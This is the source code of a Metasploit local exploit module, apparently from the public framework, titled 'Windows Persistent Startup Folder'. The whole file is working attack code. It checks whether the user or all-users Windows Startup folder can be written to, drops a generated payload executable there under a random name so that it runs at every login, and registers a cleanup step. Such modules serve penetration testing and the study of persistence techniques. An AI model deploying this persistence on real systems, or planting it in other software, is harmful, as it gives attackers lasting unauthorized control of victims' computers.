1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Exploit::EXE
11
  include Msf::Exploit::Local::Persistence
12
  prepend Msf::Exploit::Remote::AutoCheck
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Windows Persistent Startup Folder',
19
        'Description' => %q{
20
          This module establishes persistence by creating a payload in the user or system startup folder.
21
          Works on Vista and newer systems.
22
        },
23
        'License' => MSF_LICENSE,
24
        'Author' => [ 'h00die' ],
25
        'Platform' => [ 'win' ],
26
        'SessionTypes' => [ 'meterpreter', 'shell' ],
27
        'Targets' => [
28
          [ 'Automatic', {} ]
29
        ],
30
        'DefaultTarget' => 0,
31
        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
32
        'References' => [
33
          ['ATT&CK', Mitre::Attack::Technique::T1547_001_REGISTRY_RUN_KEYS_STARTUP_FOLDER],
34
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
35
          ['URL', 'https://support.microsoft.com/en-us/windows/configure-startup-applications-in-windows-115a420a-0bff-4a6f-90e0-1934c844e473']
36
        ],
37
        'DisclosureDate' => '1995-01-01', # windows 95
38
        'Notes' => {
39
          'Stability' => [CRASH_SAFE],
40
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
41
          'SideEffects' => [ARTIFACTS_ON_DISK]
42
        }
43
      )
44
    )
45

46
    register_options(
47
      [
48
        OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
49
        OptEnum.new('CONTEXT', [false, 'Target current User or All Users (system)', 'USER', ['USER', 'SYSTEM'] ])
50
      ]
51
    )
52
  end
53

54
  def folder
55
    if datastore['CONTEXT'] == 'USER'
56
      f = session.sys.config.getenv('%userprofile%')
57
      f = "#{f}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
58
      return f
59
    end
60
    f = session.sys.config.getenv('%ProgramData%')
61
    "#{f}\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
62
  end
63

64
  def check
65
    f = folder
66
    begin
67
      # windows only ps payloads have writable? so try that first
68
      return CheckCode::Safe("Unable to write to #{f}") unless writable?(f)
69
    rescue RuntimeError
70
      filename = f + '\\' + Rex::Text.rand_text_alpha((rand(6..13)))
71
      write_file(filename, '')
72
      if exists? filename
73
        rm_f(filename)
74
        return CheckCode::Appears("Likely exploitable, able to write test file to #{f}")
75
      else
76
        return CheckCode::Safe("Unable to write to #{f}")
77
      end
78
    end
79

80
    CheckCode::Appears('Likely exploitable')
81
  end
82

83
  def install_persistence
84
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
85
    payload_exe = generate_payload_exe
86
    payload_pathname = folder + '\\' + payload_name + '.exe'
87
    vprint_good("Writing payload to #{payload_pathname}")
88
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
89
    vprint_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_pathname}")
90
    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '/')}\"\n"
91
  end
92
end
93

94